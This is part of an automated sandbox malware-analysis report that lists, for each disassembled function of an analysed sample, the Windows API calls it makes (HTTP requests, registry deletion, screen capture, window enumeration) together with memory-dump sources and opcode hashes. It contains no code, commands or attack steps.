                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 2429346358-3619404913
                                                        • Opcode ID: 12223934d413c563b8074e74b7ecd6873bfd8dcf2cdb24512217a6384d5b2811
                                                        • Instruction ID: f0e9d7a6cea78f1e9f81c11bd4d9f9b960e443b0391fe39b63f68de0efbce718
                                                        • Opcode Fuzzy Hash: 12223934d413c563b8074e74b7ecd6873bfd8dcf2cdb24512217a6384d5b2811
                                                        • Instruction Fuzzy Hash: 15718C70104244AFDB21DF19DC48FAABBE9FB89708F14142DF58DA7261D771E90ADB22
                                                        Function 00E6C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E6C4B0
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E6C4C3
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E6C4D7
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E6C4F0
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E6C533
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E6C549
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E6C554
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E6C584
                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E6C5DC
                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E6C5F0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00E6C5FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                        • String ID:
                                                        • API String ID: 3800310941-3916222277
                                                        • Opcode ID: 242b5d6fc35ab8ca90bb11c3b97741aa3cff8ad83d317da62ab5ded0f36c16b1
                                                        • Instruction ID: 45d6f38b2e32fc647ab4fef4bd905d923d9ac93f956c169bf7aab52302661516
                                                        • Opcode Fuzzy Hash: 242b5d6fc35ab8ca90bb11c3b97741aa3cff8ad83d317da62ab5ded0f36c16b1
                                                        • Instruction Fuzzy Hash: 46515FB0540608BFDB218F61DD48ABB7BFCFF09788F20541AF58AE6150DB35E9489B60
                                                        Function 00E8856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00E88592
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885A2
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885AD
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885BA
                                                        • GlobalLock.KERNEL32(00000000), ref: 00E885C8
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885D7
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00E885E0
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885E7
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00E885F8
                                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00E8FC38,?), ref: 00E88611
                                                        • GlobalFree.KERNEL32(00000000), ref: 00E88621
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00E88641
                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00E88671
                                                        • DeleteObject.GDI32(?), ref: 00E88699
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E886AF
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: e77fb439f6d9a1f8fc4b216ea070778c102eb561056c54d1626cd1e343a2cc46
                                                        • Instruction ID: 0355719678c08e522de2cc0a4f8c1dcd61f83b77d4de0d3a0a98ab6c7b1eae09
                                                        • Opcode Fuzzy Hash: e77fb439f6d9a1f8fc4b216ea070778c102eb561056c54d1626cd1e343a2cc46
                                                        • Instruction Fuzzy Hash: 8341FC75600204AFDB11DF66DD88EAA7BB9FF8AB15F104058F90DF72A0DB309905DB60
                                                        Function 00E614BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00E61502
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E6150B
                                                        • VariantClear.OLEAUT32(?), ref: 00E61517
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E615FB
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00E61657
                                                        • VariantInit.OLEAUT32(?), ref: 00E61708
                                                        • SysFreeString.OLEAUT32(?), ref: 00E6178C
                                                        • VariantClear.OLEAUT32(?), ref: 00E617D8
                                                        • VariantClear.OLEAUT32(?), ref: 00E617E7
                                                        • VariantInit.OLEAUT32(00000000), ref: 00E61823
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 1234038744-3931177956
                                                        • Opcode ID: 7a5c08d12b8f486f6db8587dddebfdceda97462679c51b4684077783f016eb6f
                                                        • Instruction ID: 5790e7595f40e06d89131d82f42eac707a185a6a702ebd70492f5c084a11339e
                                                        • Opcode Fuzzy Hash: 7a5c08d12b8f486f6db8587dddebfdceda97462679c51b4684077783f016eb6f
                                                        • Instruction Fuzzy Hash: C1D10F71A40209DBDB119F65E884BB9F7B5FF45740F28909AE447BB580EB30EC84DB61
                                                        Function 00E7B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E7C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7B6AE,?,?), ref: 00E7C9B5
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7C9F1
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA68
                                                          • Part of subcall function 00E7C998: _wcslen.LIBCMT ref: 00E7CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E7B6F4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E7B772
                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 00E7B80A
                                                        • RegCloseKey.ADVAPI32(?), ref: 00E7B87E
                                                        • RegCloseKey.ADVAPI32(?), ref: 00E7B89C
                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E7B8F2
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E7B904
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E7B922
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00E7B983
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00E7B994
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 146587525-4033151799
                                                        • Opcode ID: 374f4fefe637c7c258631b78f362b77c085d0491735d9e6d0a39a45fcf009cd8
                                                        • Instruction ID: 74ed28ad9f1878bfcb34ef8bd1aaa292f7704cbfdda73712de7bbbfc3c8c1525
                                                        • Opcode Fuzzy Hash: 374f4fefe637c7c258631b78f362b77c085d0491735d9e6d0a39a45fcf009cd8
                                                        • Instruction Fuzzy Hash: BAC16C30204201AFD714DF14C495F2ABBE5FF84308F15D55CE5AAAB6A2CB71ED45CBA2
                                                        Function 00E7255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00E725D8
                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E725E8
                                                        • CreateCompatibleDC.GDI32(?), ref: 00E725F4
                                                        • SelectObject.GDI32(00000000,?), ref: 00E72601
                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E7266D
                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E726AC
                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E726D0
                                                        • SelectObject.GDI32(?,?), ref: 00E726D8
                                                        • DeleteObject.GDI32(?), ref: 00E726E1
                                                        • DeleteDC.GDI32(?), ref: 00E726E8
                                                        • ReleaseDC.USER32(00000000,?), ref: 00E726F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 4bfc087e34925a8d3ec665ce3aca891ccfa02798eed0535185c3e1b62d4004f8
                                                        • Instruction ID: d79f996c98debcdd6eb6ac02de0ff1411afad1e8985c5d2921b1db0c35facfa4
                                                        • Opcode Fuzzy Hash: 4bfc087e34925a8d3ec665ce3aca891ccfa02798eed0535185c3e1b62d4004f8
                                                        • Instruction Fuzzy Hash: 2C61D275D00219EFCB14CFA4D984AAEBBF5FF48310F20852AE559B7250D770A9519FA0
                                                        Function 00E2DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 00E2DAA1
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D659
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D66B
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D67D
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D68F
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6A1
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6B3
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6C5
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6D7
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6E9
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D6FB
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D70D
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D71F
                                                          • Part of subcall function 00E2D63C: _free.LIBCMT ref: 00E2D731
                                                        • _free.LIBCMT ref: 00E2DA96
                                                          • Part of subcall function 00E229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000), ref: 00E229DE
                                                          • Part of subcall function 00E229C8: GetLastError.KERNEL32(00000000,?,00E2D7D1,00000000,00000000,00000000,00000000,?,00E2D7F8,00000000,00000007,00000000,?,00E2DBF5,00000000,00000000), ref: 00E229F0
                                                        • _free.LIBCMT ref: 00E2DAB8
                                                        • _free.LIBCMT ref: 00E2DACD
                                                        • _free.LIBCMT ref: 00E2DAD8
                                                        • _free.LIBCMT ref: 00E2DAFA
                                                        • _free.LIBCMT ref: 00E2DB0D
                                                        • _free.LIBCMT ref: 00E2DB1B
                                                        • _free.LIBCMT ref: 00E2DB26
                                                        • _free.LIBCMT ref: 00E2DB5E
                                                        • _free.LIBCMT ref: 00E2DB65
                                                        • _free.LIBCMT ref: 00E2DB82
                                                        • _free.LIBCMT ref: 00E2DB9A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 58517331e646da78a72e66c75a037a90a850e62ccbe3740543181b8fbdea6c21
                                                        • Instruction ID: d2e4aba92032d25480e30ad2dabfa100160fc84713067a28618d005a515203f4
                                                        • Opcode Fuzzy Hash: 58517331e646da78a72e66c75a037a90a850e62ccbe3740543181b8fbdea6c21
                                                        • Instruction Fuzzy Hash: 6B316971608724AFEB22AB38FC45B5AB7E9FF44314F516429E649F7191DF30AC808B60
                                                        Function 00E5365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E5369C
                                                        • _wcslen.LIBCMT ref: 00E536A7
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E53797
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E5380C
                                                        • GetDlgCtrlID.USER32(?), ref: 00E5385D
                                                        • GetWindowRect.USER32(?,?), ref: 00E53882
                                                        • GetParent.USER32(?), ref: 00E538A0
                                                        • ScreenToClient.USER32(00000000), ref: 00E538A7
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E53921
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E5395D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                        • String ID: %s%u
                                                        • API String ID: 4010501982-679674701
                                                        • Opcode ID: b910cafdb5c72feae82a78f12c3fb63ca3042abcb8cd44b994d5e206b689025a
                                                        • Instruction ID: bf039b76b8e8cad6a8739ea2239c3ca3c198ca381de09ae6ec05a4963f7498d1
                                                        • Opcode Fuzzy Hash: b910cafdb5c72feae82a78f12c3fb63ca3042abcb8cd44b994d5e206b689025a
                                                        • Instruction Fuzzy Hash: D191C4B1204606AFD719DF34C884BEAB7A8FF44385F005929FD99E2190DB30AA59CB91
                                                        Function 00E54954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E54994
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E549DA
                                                        • _wcslen.LIBCMT ref: 00E549EB
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00E549F7
                                                        • _wcsstr.LIBVCRUNTIME ref: 00E54A2C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E54A64
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E54A9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E54AE6
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E54B20
                                                        • GetWindowRect.USER32(?,?), ref: 00E54B8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                        • String ID: ThumbnailClass
                                                        • API String ID: 1311036022-1241985126
                                                        • Opcode ID: de4fdf583cf142315cb5fb2bad82f0b56a50f765a67184156c89d253081eeb81
                                                        • Instruction ID: 6be0a80030b92a477040bb35c502fcf5668848c7ddb5029d89ec37d122d08c75
                                                        • Opcode Fuzzy Hash: de4fdf583cf142315cb5fb2bad82f0b56a50f765a67184156c89d253081eeb81
                                                        • Instruction Fuzzy Hash: CD91C4B10042059FDB04DF14C985BAA77E8FF8471DF049869FD89A61D6EB30ED89CB61
                                                        Function 00E88D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E88D5A
                                                        • GetFocus.USER32 ref: 00E88D6A
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00E88D75
                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00E88E1D
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E88ECF
                                                        • GetMenuItemCount.USER32(?), ref: 00E88EEC
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00E88EFC
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E88F2E
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E88F70
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E88FA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                        • String ID: 0
                                                        • API String ID: 1026556194-4108050209
                                                        • Opcode ID: 88d38fbbf0c711f4c22d5c7ba97d582c16e42b238eebc101af23bf9c367171f7
                                                        • Instruction ID: c06c337f3c02d0e80185ffd7ea0b7aa896df61e6243821ebc00c906507dabefa
                                                        • Opcode Fuzzy Hash: 88d38fbbf0c711f4c22d5c7ba97d582c16e42b238eebc101af23bf9c367171f7
                                                        • Instruction Fuzzy Hash: 94819C716083059FDB10EF14DA84AAB7BE9FB89318F541529FE8CB7291DB30D905CB62
                                                        Function 00E5DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E5DC20
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E5DC46
                                                        • _wcslen.LIBCMT ref: 00E5DC50
                                                        • _wcsstr.LIBVCRUNTIME ref: 00E5DCA0
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E5DCBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 1939486746-1459072770
                                                        • Opcode ID: 33658831dfb13f56d0c4e11fca49922967c00ef3bd2b89bccb2eb92b9eb442db
                                                        • Instruction ID: a8c5c183b33f72a3e63d8722877c4a4abc7efd25b229d3af5519bdeda14344be
                                                        • Opcode Fuzzy Hash: 33658831dfb13f56d0c4e11fca49922967c00ef3bd2b89bccb2eb92b9eb442db
                                                        • Instruction Fuzzy Hash: 0B4110329442057ADB24A674DC03EFF77BCEF46720F20246AF904B61D2EB359A4587B5
                                                        Function 00E7CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E7CC64
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00E7CC8D
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E7CD48
                                                          • Part of subcall function 00E7CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00E7CCAA
                                                          • Part of subcall function 00E7CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00E7CCBD
                                                          • Part of subcall function 00E7CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E7CCCF
                                                          • Part of subcall function 00E7CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00E7CD05
                                                          • Part of subcall function 00E7CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E7CD28
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E7CCF3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
